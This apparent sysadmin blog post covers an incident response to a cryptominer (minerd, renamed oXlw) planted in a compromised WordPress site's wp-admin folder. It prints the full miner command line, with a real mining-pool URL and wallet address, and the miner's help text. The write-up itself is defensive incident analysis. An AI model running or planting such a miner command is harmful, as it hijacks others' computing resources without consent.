Hi Ho! Hi Ho! Its off to mine we go.

Here is something you do not see every day – first instance we have seen of a server being used for cryptocurrency mining using a distributed compute model. The application was called as oXlw, however, I should imagine this is a random file name. The process being run was minerd, and the compute controller was mine.sumo.fairpool.cloud.

The incident was noted because of high levels of CPU being used on this host. An initial htop showed that there were two applications that were mopping up pretty much all of the cycles.

username 31039 0.0 0.0 11644 1152 ? S Jan27 0:00 sh -c /var/www/vhosts/blahblahdomain.com/public_html/wp-admin/network/oXlw -a cryptonight -o stratum+tcp://mine.sumo.fairpool.cloud:5555 -u Sumoo1rDNRshoJnVgCSAvw1mk89bi3czydD9n2tg7eaKQ83biSUAcU4ZaLHSyKeYQuCcSKrVXgykaTNmZAQdwmYzc4e7qV5MGGc.d31bcbe8b363017b61db3f993be19b092b799f0d1478bd57e222b025641ab931+worker42 > /dev/null 2>&1

username 31040 98.3 0.0 539700 10524 ? Sl Jan27 6390:37 \_ /var/www/vhosts/blahblahdomain.com/public_html/wp-admin/network/oXlw -a cryptonight -o stratum+tcp://mine.sumo.fairpool.cloud:5555 -u Sumoo1rDNRshoJnVgCSAvw1mk89bi3czydD9n2tg7eaKQ83biSUAcU4ZaLHSyKeYQuCcSKrVXgykaTNmZAQdwmYzc4e7qV5MGGc.d31bcbe8b363017b61db3f993be19b092b799f0d1478bd57e222b025641ab931+worker42

A little closer investigation – having suitably neutered myself – shows a little more help, so we can see what is going on here – minerd. Funnily enough (although almost a little disappointed that it is not) not something that is available from your regular apt or yum installs. More is the shame I say! It would appear that minerd and the like is going to be like an IRC server of the day.

-bash-4.2$ ./oXlw –help
./oXlw: /lib64/libcurl.so.4: no version information available (required by ./oXlw)
[2018-01-31 14:52:20] I go faster as root.
Usage: minerd [OPTIONS]
Options:
-o, –url=URL URL of mining server
-O, –userpass=U:P username:password pair for mining server
-u, –user=USERNAME username for mining server
-p, –pass=PASSWORD password for mining server
–cert=FILE certificate for mining server using SSL
-x, –proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
-t, –threads=N number of miner threads (default: number of processors)
-r, –retries=N number of times to retry if a network call fails
(default: retry indefinitely)
-R, –retry-pause=N time to pause between retries, in seconds (default: 30)
-T, –timeout=N timeout for long polling, in seconds (default: none)
-s, –scantime=N upper bound on time spent scanning current work when
long polling is unavailable, in seconds (default: 5)
–no-longpoll disable X-Long-Polling support
–no-stratum disable X-Stratum support
–no-redirect ignore requests to change the URL of the mining server
-q, –quiet disable per-thread hashmeter output
-D, –debug enable debug output
-P, –protocol-dump verbose dump of protocol-level activities
-S, –syslog use system log for output messages
-B, –background run the miner in the background
–benchmark run in offline benchmark mode
-c, –config=FILE load a JSON-format configuration file
-V, –version display version information and exit
-h, –help display this help text and exit

Logs, process information, and so-forth put on ice for analysis. Customer contacted. The website “will be rebuilt”. Again. The sequel. This time, they mean it.

No doubt we will be seeing more of this in future.

Credit where credit due – good spot.

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this:
Skip to toolbar